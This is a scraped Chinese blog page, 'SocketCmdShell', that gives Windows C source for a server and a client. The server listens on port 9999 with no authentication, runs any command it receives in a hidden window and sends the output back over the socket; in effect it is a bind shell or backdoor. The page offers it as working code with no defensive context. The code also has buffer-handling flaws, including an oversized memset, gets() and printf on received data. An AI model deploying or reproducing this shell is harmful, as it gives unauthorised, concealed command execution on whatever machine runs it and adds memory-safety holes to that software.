SocketCmdShell
来源:互联网 发布:何为道义 知乎 编辑:程序博客网 时间:2024/06/03 19:48
利用管道获取cmd命令记录
Server:
#include <stdio.h>#include <winsock2.h>#include <Windows.h>#pragma comment(lib,"ws2_32.lib")int main(int argc, char* argv[]){ //初始化WSA WORD sockVersion = MAKEWORD(2,2); WSADATA wsaData; if(WSAStartup(sockVersion, &wsaData)!=0) { return 0; } //创建套接字 SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(slisten == INVALID_SOCKET) { printf("socket error !"); return 0; } //绑定IP和端口 sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(9999); sin.sin_addr.S_un.S_addr = INADDR_ANY; if(bind(slisten, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) { printf("bind error !"); } //开始监听 if(listen(slisten, 5) == SOCKET_ERROR) { printf("listen error !"); return 0; } //循环接收数据 SOCKET sClient; sockaddr_in remoteAddr; int nAddrlen = sizeof(remoteAddr); char revData[255]={0}; while (TRUE) { // printf("等待连接...\n"); sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen); if(sClient == INVALID_SOCKET) { printf("accept error !"); // continue; } // printf("接受到一个连接:%s \r\n", inet_ntoa(remoteAddr.sin_addr)); while(TRUE) { //接收数据 memset(revData,0,256); int ret = recv(sClient, revData, 255, 0); if(ret > 0) { revData[ret] = 0x00; //printf(revData); } if (ret == 0) continue; if(ret<0) break; SECURITY_ATTRIBUTES sa; HANDLE hRead,hWrite; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; if(!CreatePipe(&hRead,&hWrite,&sa,0)) { // MessageBox(NULL,"Error on CreatePipe","ERROR",NULL); return 0; } STARTUPINFOA si; PROCESS_INFORMATION pi; memset(&si,0,sizeof(si)); memset(&pi,0,sizeof(pi)); si.cb = sizeof(STARTUPINFO); GetStartupInfoA(&si); si.hStdError = hWrite; si.hStdOutput = hWrite; si.wShowWindow = SW_HIDE; si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; if(!CreateProcessA(NULL,revData,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { send(sClient,"Cmd Error\n",strlen("Cmd Error\n"),0); continue; } // printf("GetLastError: %d\n",GetLastError()); CloseHandle(hWrite); WaitForSingleObject(pi.hProcess,5000); char buffer[1024] = {0}; int len=0; DWORD byteRead; BOOL hResult; do { memset(buffer,0,1024); //when second ReadFile Program Stop here hResult = ReadFile(hRead,buffer,1023,&byteRead,NULL); //printf("%s\n",buffer); len = len + byteRead; //loop send send(sClient, buffer, strlen(buffer), 0); }while(byteRead!=0 && hResult); //CloseHandle(hWrite); CloseHandle(hRead); } closesocket(sClient); } closesocket(slisten); WSACleanup(); getchar(); return 0;}
Client:
#include <winsock2.h>#include <stdio.h>#pragma comment(lib,"ws2_32.lib")int main(int argc, char* argv[]){ WORD sockVersion = MAKEWORD(2,2); WSADATA data; if(WSAStartup(sockVersion, &data) != 0) { return 0; } SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sclient == INVALID_SOCKET) { printf("invalid socket !"); return 0; } sockaddr_in serAddr; serAddr.sin_family = AF_INET; serAddr.sin_port = htons(9999); serAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); if (connect(sclient, (sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR) { printf("connect error !"); closesocket(sclient); return 0; } char szSendCmd[256]= {0}; char szReciveResult[1024]={0}; int iRet ; while(TRUE) { memset(szSendCmd,0,256); memset(szReciveResult,0,1024); printf("Please Input cmd Command:\n"); gets(szSendCmd); if(strlen(szSendCmd) == 0) continue; printf("szSendCmd : %s\n",szSendCmd); if(!strcmp(szSendCmd,"exit")) { printf("stop shell ^-^ Exit! Please Input Enter\n"); getchar(); break; } send(sclient,szSendCmd,strlen(szSendCmd),0); while(TRUE) { memset(szReciveResult,0,1024); iRet = recv(sclient,szReciveResult,1023,0); if(!strcmp(szReciveResult,"Cmd Error\n")) { szReciveResult[iRet]=0x00; printf(szReciveResult); break; } if((iRet>0)&&(iRet==1023)) { szReciveResult[iRet]=0x00; printf(szReciveResult); } if(iRet < 1023) { szReciveResult[iRet]=0x00; printf(szReciveResult); break; } } } closesocket(sclient); WSACleanup(); return 0;}
阅读全文
2 0
- SocketCmdShell
- fzu-2258
- 三维工艺设计管理系统助力中国制造业
- Karhunen-Loeve变换
- itchat爬取朋友圈签名制作词云
- opencv绝对路径
- SocketCmdShell
- POJ 3080 Blue Jeans——暴力 + kmp
- daterangepicker 年月可选择
- 【勤哲应用】勤哲软件解决生产型企业BOM应用难题
- Generate mybatis 生成text属性
- 【Paper Note】Very Deep Convolutional Network For Large-Scale Image Recognition 论文翻译(VGG)
- unity3d 特性使用
- Mybaits 动态查询数据库
- web项目中,网址前面的小图标如何添加